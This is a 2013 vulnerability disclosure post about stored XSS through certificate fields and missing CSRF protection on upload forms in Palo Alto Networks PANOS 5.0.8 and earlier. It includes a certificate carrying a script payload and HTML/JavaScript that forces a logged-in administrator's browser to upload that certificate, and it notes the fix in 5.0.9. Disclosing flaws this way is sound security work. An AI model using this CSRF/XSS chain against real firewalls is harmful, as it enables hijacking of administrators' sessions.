Friday, November 22, 2013

Palo Alto Networks PANOS <= 5.0.8 XSS

A couple of bugs exist in Palo Alto Networks PANOS <= 5.0.8 which can be exploited to conduct cross-site scripting attacks.
  • Certificate fields are displayed in the firewall web interface without proper sanitization applied to them. This way it is possible to inject html into the web interface.
  • Various file upload forms used by the firewall do not implement proper CSRF protection. import.certificate.php for example. 


Example of a certificate containing html that will be rendered:

Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number:
            e5:67:53:d1:e4:2a:71:ec
        Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=XX, ST=<style onload="javascript:alert(1)" />, L=Default City, O=Default Company Ltd
        Validity
            Not Before: Oct  1 16:28:18 2013 GMT
            Not After : Oct  1 16:28:18 2014 GMT
        Subject: C=XX, ST=<style onload="javascript:alert(1)" />, L=Default City, O=Default Company Ltd
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (1024 bit)
                Modulus:
                    00:b1:d1:b4:9a:58:5e:20:99:15:03:f0:38:e5:dd:
                    11:f1:f1:14:26:3b:aa:6e:6b:c1:c1:28:01:be:d3:
                    93:e8:b5:fb:2e:a8:89:b2:87:56:93:54:60:a6:0c:
                    40:85:31:f8:9d:fd:00:0e:2f:f1:58:e6:a5:8a:0a:
                    67:57:70:06:13:02:2e:68:44:8b:a1:23:b1:bd:27:
                    d4:88:9d:f1:44:76:65:bb:e4:70:b5:fe:9c:21:57:
                    6a:11:df:56:b5:5d:c7:18:b9:b1:9a:81:c9:ae:80:
                    16:9d:11:76:e1:6f:a8:94:dd:01:02:c7:87:7e:cc:
                    b0:06:69:d5:84:79:64:45:d3
                Exponent: 65537 (0x10001)
    Signature Algorithm: sha1WithRSAEncryption
        03:12:b6:12:74:67:8f:ac:e0:5f:02:31:b3:63:10:78:33:9d:
        5e:c0:14:d9:d9:f6:ab:17:45:d3:fa:37:b8:c6:15:7c:24:a4:
        83:61:c6:8c:92:1d:2b:2b:0d:f9:84:79:e7:db:26:07:63:e4:
        9b:3a:3c:5f:a4:31:99:4e:79:30:95:a3:ce:86:9c:09:fa:e0:
        3d:7b:c1:c4:ec:7a:79:b3:9c:7f:e2:36:3e:f2:40:cf:c0:57:
        b0:4c:99:18:76:14:23:30:da:b3:90:2d:cd:af:65:80:bc:db:
        db:3f:9e:44:a1:2e:5e:e2:29:83:ff:29:ec:17:df:8f:7b:55:
        5d:ed


Example html source code to CSRF POST this rogue cert :

  1. PA: <input type="text" id="url" value="https://10.10.10.22">
  2. <input type=button onclick="upload()" value="Upload Certificate"/>
  3. <hr>
  4. <textarea rows=80 cols=80 id=text>
  5. -----------------------------
  6. Content-Disposition: form-data; name="ext-comp-2304"
  7. on
  8. -----------------------------
  9. Content-Disposition: form-data; name="certFile"; filename="server.crt"
  10. Content-Type: application/octet-stream
  11. -----BEGIN CERTIFICATE-----
  12. MIICXTCCAcYCCQDlZ1PR5Cpx7DANBgkqhkiG9w0BAQUFADBzMQswCQYDVQQGEwJY
  13. WDEvMC0GA1UECAwmPHN0eWxlIG9ubG9hZD0iamF2YXNjcmlwdDphbGVydCgxKSIg
  14. Lz4xFTATBgNVBAcMDERlZmF1bHQgQ2l0eTEcMBoGA1UECgwTRGVmYXVsdCBDb21w
  15. YW55IEx0ZDAeFw0xMzEwMDExNjI4MThaFw0xNDEwMDExNjI4MThaMHMxCzAJBgNV
  16. BAYTAlhYMS8wLQYDVQQIDCY8c3R5bGUgb25sb2FkPSJqYXZhc2NyaXB0OmFsZXJ0
  17. KDEpIiAvPjEVMBMGA1UEBwwMRGVmYXVsdCBDaXR5MRwwGgYDVQQKDBNEZWZhdWx0
  18. IENvbXBhbnkgTHRkMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCx0bSaWF4g
  19. mRUD8Djl3RHx8RQmO6pua8HBKAG+05PotfsuqImyh1aTVGCmDECFMfid/QAOL/FY
  20. 5qWKCmdXcAYTAi5oRIuhI7G9J9SInfFEdmW75HC1/pwhV2oR31a1XccYubGagcmu
  21. gBadEXbhb6iU3QECx4d+zLAGadWEeWRF0wIDAQABMA0GCSqGSIb3DQEBBQUAA4GB
  22. AAMSthJ0Z4+s4F8CMbNjEHgznV7AFNnZ9qsXRdP6N7jGFXwkpINhxoySHSsrDfmE
  23. eefbJgdj5Js6PF+kMZlOeTCVo86GnAn64D17wcTsenmznH/iNj7yQM/AV7BMmRh2
  24. FCMw2rOQLc2vZYC829s/nkShLl7iKYP/KewX3497VV3t
  25. -----END CERTIFICATE-----
  26. -----------------------------
  27. Content-Disposition: form-data; name="ext-comp-2306"
  28. Base64 Encoded Certificate (PEM)
  29. -----------------------------
  30. Content-Disposition: form-data; name="keyFile"; filename=""
  31. Content-Type: application/octet-stream
  32. -----------------------------
  33. Content-Disposition: form-data; name="bImportCertificateSubmit"
  34. OK
  35. -----------------------------
  36. Content-Disposition: form-data; name="certFileC"
  37. server.crt
  38. -----------------------------
  39. Content-Disposition: form-data; name="vsysC"
  40. shared
  41. -----------------------------
  42. Content-Disposition: form-data; name="passPhrase"
  43. -----------------------------
  44. Content-Disposition: form-data; name="keyFileC"
  45. -----------------------------
  46. Content-Disposition: form-data; name="certName"
  47. TPOLLET
  48. -----------------------------
  49. Content-Disposition: form-data; name="format"
  50. pem
  51. -----------------------------
  52. Content-Disposition: form-data; name="includekey"
  53. -----------------------------
  54. Content-Disposition: form-data; name="certType"
  55. device
  56. -----------------------------
  57. Content-Disposition: form-data; name="template"
  58. -------------------------------
  59. </textarea>
  60. <script>
  61. function upload() {
  62.   text = document.getElementById('text').value
  63.   host = document.getElementById('url').value;
  64.   url  = host + "/php/device/import.certificate.php";
  65.   xhr  = new XMLHttpRequest();
  66.   xhr.withCredentials = true;
  67.   xhr.open("POST", url, true);
  68.   xhr.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------");
  69.   xhr.send(text);
  70.   alert('check ' + host + '/#device::vsys1::device/certificate-management/certificates' );
  71. }
  72. </script>

These issues have been fixed in PANOS 5.0.9, mentioned in the release notes like this:

57343—Fixed an issue that caused improper handling of imported certificates that contained HTML.